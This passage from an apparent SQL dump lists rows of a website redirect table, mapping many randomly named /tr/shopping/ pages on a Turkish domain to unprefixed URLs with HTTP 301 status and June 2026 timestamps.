00:00:00',301),(66210,'https://3s-technologies.com.tr/tr/shopping/antisemitic/3028523757.html',NULL,'https://3s-technologies.com.tr/shopping/antisemitic/3028523757.html','',1,0,'2026-06-10 21:53:25','0000-00-00 00:00:00',301),(66211,'https://3s-technologies.com.tr/tr/shopping/gulph/2777898796.html',NULL,'https://3s-technologies.com.tr/shopping/gulph/2777898796.html','',1,0,'2026-06-10 21:53:30','0000-00-00 00:00:00',301),(66212,'https://3s-technologies.com.tr/tr/shopping/inadvisable/2035895217.html',NULL,'https://3s-technologies.com.tr/shopping/inadvisable/2035895217.html','',1,0,'2026-06-10 21:53:35','0000-00-00 00:00:00',301),(66213,'https://3s-technologies.com.tr/tr/shopping/decubation/494286112.html',NULL,'https://3s-technologies.com.tr/shopping/decubation/494286112.html','',1,0,'2026-06-10 21:53:40','0000-00-00 00:00:00',301),(66214,'https://3s-technologies.com.tr/tr/shopping/stonebock/1221020523.html',NULL,'https://3s-technologies.com.tr/shopping/stonebock/1221020523.html','',1,0,'2026-06-10 21:53:45','0000-00-00 00:00:00',301),(66215,'https://3s-technologies.com.tr/tr/shopping/mistic/537545078.html',NULL,'https://3s-technologies.com.tr/shopping/mistic/537545078.html','',1,0,'2026-06-10 21:53:51','0000-00-00 00:00:00',301),(66216,'https://3s-technologies.com.tr/tr/shopping/pericula/2086697587.html',NULL,'https://3s-technologies.com.tr/shopping/pericula/2086697587.html','',1,0,'2026-06-10 21:53:54','0000-00-00 00:00:00',301),(66217,'https://3s-technologies.com.tr/tr/shopping/cosmometry/1726124670.html',NULL,'https://3s-technologies.com.tr/shopping/cosmometry/1726124670.html','',1,0,'2026-06-10 21:53:59','0000-00-00 00:00:00',301),(66218,'https://3s-technologies.com.tr/tr/shopping/uncurl/1994169376.html',NULL,'https://3s-technologies.com.tr/shopping/uncurl/1994169376.html','',1,0,'2026-06-10 21:54:04','0000-00-00 00:00:00',301),(66219,'https://3s-technologies.com.tr/tr/shopping/irone/1386965590.html',NULL,'https://3s-technologies.com.tr/shopping/irone/1386965590.html','',1,0,'2026-06-10 21:54:09','0000-00-00 00:00:00',301),(66220,'https://3s-technologies.com.tr/tr/shopping/drasty/1998921671.html',NULL,'https://3s-technologies.com.tr/shopping/drasty/1998921671.html','',1,0,'2026-06-10 21:54:14','0000-00-00 00:00:00',301),(66221,'https://3s-technologies.com.tr/tr/shopping/prudentially/1701576007.html',NULL,'https://3s-technologies.com.tr/shopping/prudentially/1701576007.html','',1,0,'2026-06-10 21:54:19','0000-00-00 00:00:00',301),(66222,'https://3s-technologies.com.tr/tr/shopping/dredging/1959231054.html',NULL,'https://3s-technologies.com.tr/shopping/dredging/1959231054.html','',1,0,'2026-06-10 21:54:24','0000-00-00 00:00:00',301),(66223,'https://3s-technologies.com.tr/tr/shopping/carbamic/3968693623.html',NULL,'https://3s-technologies.com.tr/shopping/carbamic/3968693623.html','',1,0,'2026-06-10 21:54:29','0000-00-00 00:00:00',301),(66224,'https://3s-technologies.com.tr/tr/shopping/roughshod/2479087736.html',NULL,'https://3s-technologies.com.tr/shopping/roughshod/2479087736.html','',1,0,'2026-06-10 21:54:34','0000-00-00 00:00:00',301),(66225,'https://3s-technologies.com.tr/tr/shopping/aurilave/3365406817.html',NULL,'https://3s-technologies.com.tr/shopping/aurilave/3365406817.html','',1,0,'2026-06-10 21:54:39','0000-00-00 00:00:00',301),(66226,'https://3s-technologies.com.tr/tr/shopping/driftpiece/1498569851.html',NULL,'https://3s-technologies.com.tr/shopping/driftpiece/1498569851.html','',1,0,'2026-06-10 21:54:44','0000-00-00 00:00:00',301),(66227,'https://3s-technologies.com.tr/tr/shopping/odious/2307732971.html',NULL,'https://3s-technologies.com.tr/shopping/odious/2307732971.html','',1,0,'2026-06-10 21:54:51','0000-00-00 00:00:00',301),(66228,'https://3s-technologies.com.tr/tr/shopping/deferring/144434166.html',NULL,'https://3s-technologies.com.tr/shopping/deferring/144434166.html','',1,0,'2026-06-10 21:54:56','0000-00-00 00:00:00',301),(66229,'https://3s-technologies.com.tr/tr/shopping/comptonite/4137883814.html',NULL,'https://3s-technologies.com.tr/shopping/comptonite/4137883814.html','',1,0,'2026-06-10 21:55:01','0000-00-00 00:00:00',301),(66230,'https://3s-technologies.com.tr/tr/shopping/vernata/967814596.html',NULL,'https://3s-technologies.com.tr/shopping/vernata/967814596.html','',1,0,'2026-06-10 21:55:06','0000-00-00 00:00:00',301),(66231,'https://3s-technologies.com.tr/tr/shopping/intemperate/1247880183.html',NULL,'https://3s-technologies.com.tr/shopping/intemperate/1247880183.html','',1,0,'2026-06-10 21:55:11','0000-00-00 00:00:00',301),(66232,'https://3s-technologies.com.tr/tr/shopping/thunder/1432572039.html',NULL,'https://3s-technologies.com.tr/shopping/thunder/1432572039.html','',1,0,'2026-06-10 21:55:16','0000-00-00 00:00:00',301),(66233,'https://3s-technologies.com.tr/tr/shopping/insipidly/282734564.html',NULL,'https://3s-technologies.com.tr/shopping/insipidly/282734564.html','',1,0,'2026-06-10 21:55:23','0000-00-00 00:00:00',301),(66234,'https://3s-technologies.com.tr/tr/shopping/typhos/951066691.html',NULL,'https://3s-technologies.com.tr/shopping/typhos/951066691.html','',1,0,'2026-06-10 21:55:26','0000-00-00 00:00:00',301),(66235,'https://3s-technologies.com.tr/tr/shopping/briefs/646165599.html',NULL,'https://3s-technologies.com.tr/shopping/briefs/646165599.html','',1,0,'2026-06-10 21:55:31','0000-00-00 00:00:00',301),(66236,'https://3s-technologies.com.tr/tr/shopping/sniveled/4135178965.html',NULL,'https://3s-technologies.com.tr/shopping/sniveled/4135178965.html','',1,0,'2026-06-10 21:55:36','0000-00-00 00:00:00',301),(66237,'https://3s-technologies.com.tr/tr/shopping/supramaxillary/2589919565.html',NULL,'https://3s-technologies.com.tr/shopping/supramaxillary/2589919565.html','',1,0,'2026-06-10 21:55:41','0000-00-00 00:00:00',301),(66238,'https://3s-technologies.com.tr/tr/shopping/pityroid/2503076841.html',NULL,'https://3s-technologies.com.tr/shopping/pityroid/2503076841.html','',1,0,'2026-06-10 21:55:46','0000-00-00 00:00:00',301),(66239,'https://3s-technologies.com.tr/tr/shopping/unsphere/3743397296.html',NULL,'https://3s-technologies.com.tr/shopping/unsphere/3743397296.html','',1,0,'2026-06-10 21:55:51','0000-00-00 00:00:00',301),(66240,'https://3s-technologies.com.tr/tr/shopping/phallism/3785818832.html',NULL,'https://3s-technologies.com.tr/shopping/phallism/3785818832.html','',1,0,'2026-06-10 21:55:59','0000-00-00 00:00:00',301),(66241,'https://3s-technologies.com.tr/tr/shopping/loath/2410648674.html',NULL,'https://3s-technologies.com.tr/shopping/loath/2410648674.html','',1,0,'2026-06-10 21:56:03','0000-00-00 00:00:00',301),(66242,'https://3s-technologies.com.tr/tr/shopping/perorate/3885883247.html',NULL,'https://3s-technologies.com.tr/shopping/perorate/3885883247.html','',1,0,'2026-06-10 21:56:08','0000-00-00 00:00:00',301),(66243,'https://3s-technologies.com.tr/tr/shopping/roughrider/764355740.html',NULL,'https://3s-technologies.com.tr/shopping/roughrider/764355740.html','',1,0,'2026-06-10 21:56:13','0000-00-00 00:00:00',301),(66244,'https://3s-technologies.com.tr/tr/shopping/pleonaste/2013346409.html',NULL,'https://3s-technologies.com.tr/shopping/pleonaste/2013346409.html','',1,0,'2026-06-10 21:56:18','0000-00-00 00:00:00',301),(66245,'https://3s-technologies.com.tr/tr/shopping/knobstick/778497628.html',NULL,'https://3s-technologies.com.tr/shopping/knobstick/778497628.html','',1,0,'2026-06-10 21:56:23','0000-00-00 00:00:00',301),(66246,'https://3s-technologies.com.tr/tr/shopping/alliteration/670090013.html',NULL,'https://3s-technologies.com.tr/shopping/alliteration/670090013.html','',1,0,'2026-06-10 21:56:28','0000-00-00 00:00:00',301),(66247,'https://3s-technologies.com.tr/tr/shopping/colias/823600158.html',NULL,'https://3s-technologies.com.tr/shopping/colias/823600158.html','',1,0,'2026-06-10 21:56:34','0000-00-00 00:00:00',301),(66248,'https://3s-technologies.com.tr/tr/shopping/adragant/3848240076.html',NULL,'https://3s-technologies.com.tr/shopping/adragant/3848240076.html','',1,0,'2026-06-10 21:56:39','0000-00-00 00:00:00',301),(66249,'https://3s-technologies.com.tr/tr/shopping/verna/2731620507.html',NULL,'https://3s-technologies.com.tr/shopping/verna/2731620507.html','',1,0,'2026-06-10 21:56:44','0000-00-00 00:00:00',301),(66250,'https://3s-technologies.com.tr/tr/shopping/immanity/398481224.html',NULL,'https://3s-technologies.com.tr/shopping/immanity/398481224.html','',1,0,'2026-06-10 21:56:49','0000-00-00 00:00:00',301),(66251,'https://3s-technologies.com.tr/tr/shopping/longan/2369628814.html',NULL,'https://3s-technologies.com.tr/shopping/longan/2369628814.html','',1,0,'2026-06-10 21:56:54','0000-00-00 00:00:00',301),(66252,'https://3s-technologies.com.tr/tr/shopping/irredeemable/2816754066.html',NULL,'https://3s-technologies.com.tr/shopping/irredeemable/2816754066.html','',1,0,'2026-06-10 21:56:59','0000-00-00 00:00:00',301),(66253,'https://3s-technologies.com.tr/tr/shopping/ebullience/3556605525.html',NULL,'https://3s-technologies.com.tr/shopping/ebullience/3556605525.html','',1,0,'2026-06-10 21:57:04','0000-00-00 00:00:00',301),(66254,'https://3s-technologies.com.tr/tr/shopping/sociologically/1954361615.html',NULL,'https://3s-technologies.com.tr/shopping/sociologically/1954361615.html','',1,0,'2026-06-10 21:57:09','0000-00-00 00:00:00',301),(66255,'https://3s-technologies.com.tr/tr/shopping/incentively/1582426620.html',NULL,'https://3s-technologies.com.tr/shopping/incentively/1582426620.html','',1,0,'2026-06-10 21:57:14','0000-00-00 00:00:00',301),(66256,'https://3s-technologies.com.tr/tr/shopping/consolato/4068957917.html',NULL,'https://3s-technologies.com.tr/shopping/consolato/4068957917.html','',1,0,'2026-06-10 21:57:20','0000-00-00 00:00:00',301),(66257,'https://3s-technologies.com.tr/tr/shopping/peace/3123918580.html',NULL,'https://3s-technologies.com.tr/shopping/peace/3123918580.html','',1,0,'2026-06-10 21:57:25','0000-00-00 00:00:00',301),(66258,'https://3s-technologies.com.tr/tr/shopping/mydaus/3261096209.html',NULL,'https://3s-technologies.com.tr/shopping/mydaus/3261096209.html','',1,0,'2026-06-10 21:57:30','0000-00-00 00:00:00',301),(66259,'https://3s-technologies.com.tr/tr/shopping/cellepore/2579858132.html',NULL,'https://3s-technologies.com.tr/shopping/cellepore/2579858132.html','',1,0,'2026-06-10 21:57:35','0000-00-00 00:00:00',301),(66260,'https://3s-technologies.com.tr/tr/shopping/despoliation/4045898061.html',NULL,'https://3s-technologies.com.tr/shopping/despoliation/4045898061.html','',1,0,'2026-06-10 21:57:40','0000-00-00 00:00:00',301),(66261,'https://3s-technologies.com.tr/tr/shopping/dodecandria/443255496.html',NULL,'https://3s-technologies.com.tr/shopping/dodecandria/443255496.html','',1,0,'2026-06-10 21:57:45','0000-00-00 00:00:00',301),(66262,'https://3s-technologies.com.tr/tr/shopping/foxtail/1372151862.html',NULL,'https://3s-technologies.com.tr/shopping/foxtail/1372151862.html','',1,0,'2026-06-10 21:57:50','0000-00-00 00:00:00',301),(66263,'https://3s-technologies.com.tr/tr/shopping/invaded/4055239144.html',NULL,'https://3s-technologies.com.tr/shopping/invaded/4055239144.html','',1,0,'2026-06-10 21:57:55','0000-00-00 00:00:00',301),(66264,'https://3s-technologies.com.tr/tr/shopping/ensear/2683609214.html',NULL,'https://3s-technologies.com.tr/shopping/ensear/2683609214.html','',1,0,'2026-06-10 21:58:00','0000-00-00 00:00:00',301),(66265,'https://3s-technologies.com.tr/tr/shopping/laevulose/1123886408.html',NULL,'https://3s-technologies.com.tr/shopping/laevulose/1123886408.html','',1,0,'2026-06-10 21:58:05','0000-00-00 00:00:00',301),(66266,'https://3s-technologies.com.tr/tr/shopping/supposititiously/3943915566.html',NULL,'https://3s-technologies.com.tr/shopping/supposititiously/3943915566.html','',1,0,'2026-06-10 21:58:10','0000-00-00 00:00:00',301),(66267,'https://3s-technologies.com.tr/tr/shopping/baffling/84404739.html',NULL,'https://3s-technologies.com.tr/shopping/baffling/84404739.html','',1,0,'2026-06-10 21:58:15','0000-00-00 00:00:00',301),(66268,'https://3s-technologies.com.tr/tr/shopping/saengerfest/1246504577.html',NULL,'https://3s-technologies.com.tr/shopping/saengerfest/1246504577.html','',1,0,'2026-06-10 21:58:20','0000-00-00 00:00:00',301),(66269,'https://3s-technologies.com.tr/tr/shopping/dulocracy/1236326032.html',NULL,'https://3s-technologies.com.tr/shopping/dulocracy/1236326032.html','',1,0,'2026-06-10 21:58:28','0000-00-00 00:00:00',301),(66270,'https://3s-technologies.com.tr/tr/shopping/usherdom/465427568.html',NULL,'https://3s-technologies.com.tr/shopping/usherdom/465427568.html','',1,0,'2026-06-10 21:58:32','0000-00-00 00:00:00',301),(66271,'https://3s-technologies.com.tr/tr/shopping/cresses/4034968127.html',NULL,'https://3s-technologies.com.tr/shopping/cresses/4034968127.html','',1,0,'2026-06-10 21:58:37','0000-00-00 00:00:00',301),(66272,'https://3s-technologies.com.tr/tr/shopping/odontography/3546887690.html',NULL,'https://3s-technologies.com.tr/shopping/odontography/3546887690.html','',1,0,'2026-06-10 21:58:41','0000-00-00 00:00:00',301),(66273,'https://3s-technologies.com.tr/tr/shopping/snobbishly/864620018.html',NULL,'https://3s-technologies.com.tr/shopping/snobbishly/864620018.html','',1,0,'2026-06-10 21:58:46','0000-00-00 00:00:00',301),(66274,'https://3s-technologies.com.tr/tr/shopping/sheathing/3120443059.html',NULL,'https://3s-technologies.com.tr/shopping/sheathing/3120443059.html','',1,0,'2026-06-10 21:58:51','0000-00-00 00:00:00',301),(66275,'https://3s-technologies.com.tr/tr/shopping/webeye/1342686169.html',NULL,'https://3s-technologies.com.tr/shopping/webeye/1342686169.html','',1,0,'2026-06-10 21:58:56','0000-00-00 00:00:00',301),(66276,'https://3s-technologies.com.tr/tr/shopping/deprecatively/2548685505.html',NULL,'https://3s-technologies.com.tr/shopping/deprecatively/2548685505.html','',1,0,'2026-06-10 21:59:02','0000-00-00 00:00:00',301),(66277,'https://3s-technologies.com.tr/tr/shopping/granilla/264673529.html',NULL,'https://3s-technologies.com.tr/shopping/granilla/264673529.html','',1,0,'2026-06-10 21:59:07','0000-00-00 00:00:00',301),(66278,'https://3s-technologies.com.tr/tr/shopping/margarite/3443510306.html',NULL,'https://3s-technologies.com.tr/shopping/margarite/3443510306.html','',1,0,'2026-06-10 21:59:11','0000-00-00 00:00:00',301),(66279,'https://3s-technologies.com.tr/tr/shopping/soldiership/3770396179.html',NULL,'https://3s-technologies.com.tr/shopping/soldiership/3770396179.html','',1,0,'2026-06-10 21:59:17','0000-00-00 00:00:00',301),(66280,'https://3s-technologies.com.tr/tr/shopping/cubbridgehead/3833244529.html',NULL,'https://3s-technologies.com.tr/shopping/cubbridgehead/3833244529.html','',1,0,'2026-06-10 21:59:21','0000-00-00 00:00:00',301),(66281,'https://3s-technologies.com.tr/tr/shopping/fastball/1634138885.html',NULL,'https://3s-technologies.com.tr/shopping/fastball/1634138885.html','',1,0,'2026-06-10 21:59:26','0000-00-00 00:00:00',301),(66282,'https://3s-technologies.com.tr/tr/shopping/leonine/2825097266.html',NULL,'https://3s-technologies.com.tr/shopping/leonine/2825097266.html','',1,0,'2026-06-10 21:59:31','0000-00-00 00:00:00',301),(66283,'https://3s-technologies.com.tr/tr/shopping/draggletailed/722829762.html',NULL,'https://3s-technologies.com.tr/shopping/draggletailed/722829762.html','',1,0,'2026-06-10 21:59:36','0000-00-00 00:00:00',301),(66284,'https://3s-technologies.com.tr/tr/shopping/lustic/3597853615.html',NULL,'https://3s-technologies.com.tr/shopping/lustic/3597853615.html','',1,0,'2026-06-10 21:59:41','0000-00-00 00:00:00',301),(66285,'https://3s-technologies.com.tr/tr/shopping/eyeteeth/658996556.html',NULL,'https://3s-technologies.com.tr/shopping/eyeteeth/658996556.html','',1,0,'2026-06-10 21:59:48','0000-00-00 00:00:00',301),(66286,'https://3s-technologies.com.tr/tr/shopping/sprucer/3608637094.html',NULL,'https://3s-technologies.com.tr/shopping/sprucer/3608637094.html','',1,0,'2026-06-10 21:59:51','0000-00-00 00:00:00',301),(66287,'https://3s-technologies.com.tr/tr/shopping/noiance/2398766233.html',NULL,'https://3s-technologies.com.tr/shopping/noiance/2398766233.html','',1,0,'2026-06-10 21:59:56','0000-00-00 00:00:00',301),(66288,'https://3s-technologies.com.tr/tr/shopping/peninsulate/2161353911.html',NULL,'https://3s-technologies.com.tr/shopping/peninsulate/2161353911.html','',1,0,'2026-06-10 22:00:01','0000-00-00 00:00:00',301),(66289,'https://3s-technologies.com.tr/tr/shopping/freehand/2465976144.html',NULL,'https://3s-technologies.com.tr/shopping/freehand/2465976144.html','',1,0,'2026-06-10 22:00:07','0000-00-00 00:00:00',301),(66290,'https://3s-technologies.com.tr/tr/shopping/flagginess/4185146991.html',NULL,'https://3s-technologies.com.tr/shopping/flagginess/4185146991.html','',1,0,'2026-06-10 22:00:12','0000-00-00 00:00:00',301),(66291,'https://3s-technologies.com.tr/tr/shopping/semioval/1405878085.html',NULL,'https://3s-technologies.com.tr/shopping/semioval/1405878085.html','',1,0,'2026-06-10 22:00:17','0000-00-00 00:00:00',301),(66292,'https://3s-technologies.com.tr/tr/shopping/financially/3343969077.html',NULL,'https://3s-technologies.com.tr/shopping/financially/3343969077.html','',1,0,'2026-06-10 22:00:21','0000-00-00 00:00:00',301),(66293,'https://3s-technologies.com.tr/tr/shopping/monogoneutic/3058873291.html',NULL,'https://3s-technologies.com.tr/shopping/monogoneutic/3058873291.html','',1,0,'2026-06-10 22:00:27','0000-00-00 00:00:00',301),(66294,'https://3s-technologies.com.tr/tr/shopping/bestar/1333013758.html',NULL,'https://3s-technologies.com.tr/shopping/bestar/1333013758.html','',1,0,'2026-06-10 22:00:32','0000-00-00 00:00:00',301),(66295,'https://3s-technologies.com.tr/tr/shopping/jugums/2573776610.html',NULL,'https://3s-technologies.com.tr/shopping/jugums/2573776610.html','',1,0,'2026-06-10 22:00:38','0000-00-00 00:00:00',301),(66296,'https://3s-technologies.com.tr/tr/shopping/blintzes/1768899087.html',NULL,'https://3s-technologies.com.tr/shopping/blintzes/1768899087.html','',1,0,'2026-06-10 22:00:42','0000-00-00 00:00:00',301),(66297,'https://3s-technologies.com.tr/tr/shopping/cottier/1970996351.html',NULL,'https://3s-technologies.com.tr/shopping/cottier/1970996351.html','',1,0,'2026-06-10 22:00:47','0000-00-00 00:00:00',301),(66298,'https://3s-technologies.com.tr/tr/shopping/resown/1172492810.html',NULL,'https://3s-technologies.com.tr/shopping/resown/1172492810.html','',1,0,'2026-06-10 22:00:52','0000-00-00 00:00:00',301),(66299,'https://3s-technologies.com.tr/tr/shopping/ethnic/1612638685.html',NULL,'https://3s-technologies.com.tr/shopping/ethnic/1612638685.html','',1,0,'2026-06-10 22:00:57','0000-00-00 00:00:00',301),(66300,'https://3s-technologies.com.tr/tr/shopping/tappen/4231360589.html',NULL,'https://3s-technologies.com.tr/shopping/tappen/4231360589.html','',1,0,'2026-06-10 22:01:02','0000-00-00 00:00:00',301),(66301,'https://3s-technologies.com.tr/tr/shopping/noctilucus/2355322191.html',NULL,'https://3s-technologies.com.tr/shopping/noctilucus/2355322191.html','',1,0,'2026-06-10 22:01:07','0000-00-00 00:00:00',301),(66302,'https://3s-technologies.com.tr/tr/shopping/zantiot/203529075.html',NULL,'https://3s-technologies.com.tr/shopping/zantiot/203529075.html','',1,0,'2026-06-10 22:01:12','0000-00-00 00:00:00',301),(66303,'https://3s-technologies.com.tr/tr/shopping/sniveler/3281384310.html',NULL,'https://3s-technologies.com.tr/shopping/sniveler/3281384310.html','',1,0,'2026-06-10 22:01:17','0000-00-00 00:00:00',301),(66304,'https://3s-technologies.com.tr/tr/shopping/caccabis/287486891.html',NULL,'https://3s-technologies.com.tr/shopping/caccabis/287486891.html','',1,0,'2026-06-10 22:01:22','0000-00-00 00:00:00',301),(66305,'https://3s-technologies.com.tr/tr/shopping/impeopled/73734429.html',NULL,'https://3s-technologies.com.tr/shopping/impeopled/73734429.html','',1,0,'2026-06-10 22:01:27','0000-00-00 00:00:00',301),(66306,'https://3s-technologies.com.tr/tr/shopping/purulent/2643491475.html',NULL,'https://3s-technologies.com.tr/shopping/purulent/2643491475.html','',1,0,'2026-06-10 22:01:33','0000-00-00 00:00:00',301),(66307,'https://3s-technologies.com.tr/tr/shopping/ballotage/134979898.html',NULL,'https://3s-technologies.com.tr/shopping/ballotage/134979898.html','',1,0,'2026-06-10 22:01:38','0000-00-00 00:00:00',301),(66308,'https://3s-technologies.com.tr/tr/shopping/bichromate/1172329287.html',NULL,'https://3s-technologies.com.tr/shopping/bichromate/1172329287.html','',1,0,'2026-06-10 22:01:43','0000-00-00 00:00:00',301),(66309,'https://3s-technologies.com.tr/tr/shopping/disintegrator/4108319289.html',NULL,'https://3s-technologies.com.tr/shopping/disintegrator/4108319289.html','',1,0,'2026-06-10 22:01:48','0000-00-00 00:00:00',301),(66310,'https://3s-technologies.com.tr/tr/shopping/milvine/1282376107.html',NULL,'https://3s-technologies.com.tr/shopping/milvine/1282376107.html','',1,0,'2026-06-10 22:01:53','0000-00-00 00:00:00',301),(66311,'https://3s-technologies.com.tr/tr/shopping/amoebea/3880082344.html',NULL,'https://3s-technologies.com.tr/shopping/amoebea/3880082344.html','',1,0,'2026-06-10 22:01:58','0000-00-00 00:00:00',301),(66312,'https://3s-technologies.com.tr/tr/shopping/spotter/2140711927.html',NULL,'https://3s-technologies.com.tr/shopping/spotter/2140711927.html','',1,0,'2026-06-10 22:02:03','0000-00-00 00:00:00',301),(66313,'https://3s-technologies.com.tr/tr/shopping/septifluous/185454026.html',NULL,'https://3s-technologies.com.tr/shopping/septifluous/185454026.html','',1,0,'2026-06-10 22:02:08','0000-00-00 00:00:00',301),(66314,'https://3s-technologies.com.tr/tr/shopping/aquarial/645213092.html',NULL,'https://3s-technologies.com.tr/shopping/aquarial/645213092.html','',1,0,'2026-06-10 22:02:13','0000-00-00 00:00:00',301),(66315,'https://3s-technologies.com.tr/tr/shopping/aleuromancy/2439279975.html',NULL,'https://3s-technologies.com.tr/shopping/aleuromancy/2439279975.html','',1,0,'2026-06-10 22:02:18','0000-00-00 00:00:00',301),(66316,'https://3s-technologies.com.tr/tr/shopping/remonstrated/745443245.html',NULL,'https://3s-technologies.com.tr/shopping/remonstrated/745443245.html','',1,0,'2026-06-10 22:02:28','0000-00-00 00:00:00',301),(66317,'https://3s-technologies.com.tr/tr/shopping/unreasoned/498039537.html',NULL,'https://3s-technologies.com.tr/shopping/unreasoned/498039537.html','',1,0,'2026-06-10 22:02:33','0000-00-00 00:00:00',301),(66318,'https://3s-technologies.com.tr/tr/shopping/uzbeks/1339095296.html',NULL,'https://3s-technologies.com.tr/shopping/uzbeks/1339095296.html','',1,0,'2026-06-10 22:02:35','0000-00-00 00:00:00',301),(66319,'https://3s-technologies.com.tr/tr/shopping/allochroous/3453917049.html',NULL,'https://3s-technologies.com.tr/shopping/allochroous/3453917049.html','',1,0,'2026-06-10 22:02:40','0000-00-00 00:00:00',301),(66320,'https://3s-technologies.com.tr/tr/shopping/chrematistics/1374576076.html',NULL,'https://3s-technologies.com.tr/shopping/chrematistics/1374576076.html','',1,0,'2026-06-10 22:02:45','0000-00-00 00:00:00',301),(66321,'https://3s-technologies.com.tr/tr/shopping/scyphae/2571352412.html',NULL,'https://3s-technologies.com.tr/shopping/scyphae/2571352412.html','',1,0,'2026-06-10 22:02:50','0000-00-00 00:00:00',301),(66322,'https://3s-technologies.com.tr/tr/shopping/luteic/2659797969.html',NULL,'https://3s-technologies.com.tr/shopping/luteic/2659797969.html','',1,0,'2026-06-10 22:02:55','0000-00-00 00:00:00',301),(66323,'https://3s-technologies.com.tr/tr/shopping/connation/2695189435.html',NULL,'https://3s-technologies.com.tr/shopping/connation/2695189435.html','',1,0,'2026-06-10 22:03:00','0000-00-00 00:00:00',301),(66324,'https://3s-technologies.com.tr/tr/shopping/planish/3362030128.html',NULL,'https://3s-technologies.com.tr/shopping/planish/3362030128.html','',1,0,'2026-06-10 22:03:05','0000-00-00 00:00:00',301),(66325,'https://3s-technologies.com.tr/tr/shopping/gomphosis/2059214665.html',NULL,'https://3s-technologies.com.tr/shopping/gomphosis/2059214665.html','',1,0,'2026-06-10 22:03:10','0000-00-00 00:00:00',301),(66326,'https://3s-technologies.com.tr/tr/shopping/overhaul/32109603.html',NULL,'https://3s-technologies.com.tr/shopping/overhaul/32109603.html','',1,0,'2026-06-10 22:03:15','0000-00-00 00:00:00',301),(66327,'https://3s-technologies.com.tr/tr/shopping/diarial/2430610732.html',NULL,'https://3s-technologies.com.tr/shopping/diarial/2430610732.html','',1,0,'2026-06-10 22:03:20','0000-00-00 00:00:00',301),(66328,'https://3s-technologies.com.tr/tr/shopping/tabacco/3961940245.html',NULL,'https://3s-technologies.com.tr/shopping/tabacco/3961940245.html','',1,0,'2026-06-10 22:03:25','0000-00-00 00:00:00',301),(66329,'https://3s-technologies.com.tr/tr/shopping/vorticellae/1995381459.html',NULL,'https://3s-technologies.com.tr/shopping/vorticellae/1995381459.html','',1,0,'2026-06-10 22:03:30','0000-00-00 00:00:00',301),(66330,'https://3s-technologies.com.tr/tr/shopping/snacot/3047155601.html',NULL,'https://3s-technologies.com.tr/shopping/snacot/3047155601.html','',1,0,'2026-06-10 22:03:35','0000-00-00 00:00:00',301),(66331,'https://3s-technologies.com.tr/tr/shopping/picatus/1759181236.html',NULL,'https://3s-technologies.com.tr/shopping/picatus/1759181236.html','',1,0,'2026-06-10 22:03:40','0000-00-00 00:00:00',301),(66332,'https://3s-technologies.com.tr/tr/shopping/subjectness/2896024230.html',NULL,'https://3s-technologies.com.tr/shopping/subjectness/2896024230.html','',1,0,'2026-06-10 22:03:46','0000-00-00 00:00:00',301),(66333,'https://3s-technologies.com.tr/tr/shopping/strategics/2506453530.html',NULL,'https://3s-technologies.com.tr/shopping/strategics/2506453530.html','',1,0,'2026-06-10 22:03:49','0000-00-00 00:00:00',301),(66334,'https://3s-technologies.com.tr/tr/shopping/company/456086453.html',NULL,'https://3s-technologies.com.tr/shopping/company/456086453.html','',1,0,'2026-06-10 22:03:52','0000-00-00 00:00:00',301),(66335,'https://3s-technologies.com.tr/tr/shopping/measurably/4230148474.html',NULL,'https://3s-technologies.com.tr/shopping/measurably/4230148474.html','',1,0,'2026-06-10 22:03:55','0000-00-00 00:00:00',301),(66336,'https://3s-technologies.com.tr/tr/shopping/kuklux/1111744375.html',NULL,'https://3s-technologies.com.tr/shopping/kuklux/1111744375.html','',1,0,'2026-06-10 22:03:58','0000-00-00 00:00:00',301),(66337,'https://3s-technologies.com.tr/tr/shopping/recollet/4198865732.html',NULL,'https://3s-technologies.com.tr/shopping/recollet/4198865732.html','',1,0,'2026-06-10 22:04:01','0000-00-00 00:00:00',301),(66338,'https://3s-technologies.com.tr/tr/shopping/muskellunge/736872818.html',NULL,'https://3s-technologies.com.tr/shopping/muskellunge/736872818.html','',1,0,'2026-06-10 22:04:04','0000-00-00 00:00:00',301),(66339,'https://3s-technologies.com.tr/tr/shopping/brachmanic/1632926802.html',NULL,'https://3s-technologies.com.tr/shopping/brachmanic/1632926802.html','',1,0,'2026-06-10 22:04:07','0000-00-00 00:00:00',301),(66340,'https://3s-technologies.com.tr/tr/shopping/reviser/3496526747.html',NULL,'https://3s-technologies.com.tr/shopping/reviser/3496526747.html','',1,0,'2026-06-10 22:04:10','0000-00-00 00:00:00',301),(66341,'https://3s-technologies.com.tr/tr/shopping/meliphagidae/1098025634.html',NULL,'https://3s-technologies.com.tr/shopping/meliphagidae/1098025634.html','',1,0,'2026-06-10 22:04:13','0000-00-00 00:00:00',301),(66342,'https://3s-technologies.com.tr/tr/shopping/scissil/333208692.html',NULL,'https://3s-technologies.com.tr/shopping/scissil/333208692.html','',1,0,'2026-06-10 22:04:16','0000-00-00 00:00:00',301),(66343,'https://3s-technologies.com.tr/tr/shopping/hoopoe/2505077908.html',NULL,'https://3s-technologies.com.tr/shopping/hoopoe/2505077908.html','',1,0,'2026-06-10 22:04:19','0000-00-00 00:00:00',301),(66344,'https://3s-technologies.com.tr/tr/shopping/resembles/569598508.html',NULL,'https://3s-technologies.com.tr/shopping/resembles/569598508.html','',1,0,'2026-06-10 22:04:22','0000-00-00 00:00:00',301),(66345,'https://3s-technologies.com.tr/tr/shopping/indobriton/3230483092.html',NULL,'https://3s-technologies.com.tr/shopping/indobriton/3230483092.html','',1,0,'2026-06-10 22:04:25','0000-00-00 00:00:00',301),(66346,'https://3s-technologies.com.tr/tr/shopping/paleographic/805753323.html',NULL,'https://3s-technologies.com.tr/shopping/paleographic/805753323.html','',1,0,'2026-06-10 22:04:28','0000-00-00 00:00:00',301),(66347,'https://3s-technologies.com.tr/tr/shopping/unfree/2232280907.html',NULL,'https://3s-technologies.com.tr/shopping/unfree/2232280907.html','',1,0,'2026-06-10 22:04:31','0000-00-00 00:00:00',301),(66348,'https://3s-technologies.com.tr/tr/shopping/arbored/2278053062.html',NULL,'https://3s-technologies.com.tr/shopping/arbored/2278053062.html','',1,0,'2026-06-10 22:04:34','0000-00-00 00:00:00',301),(66349,'https://3s-technologies.com.tr/tr/shopping/mastax/3933081701.html',NULL,'https://3s-technologies.com.tr/shopping/mastax/3933081701.html','',1,0,'2026-06-10 22:04:37','0000-00-00 00:00:00',301),(66350,'https://3s-technologies.com.tr/tr/shopping/endostosis/1637515574.html',NULL,'https://3s-technologies.com.tr/shopping/endostosis/1637515574.html','',1,0,'2026-06-10 22:04:40','0000-00-00 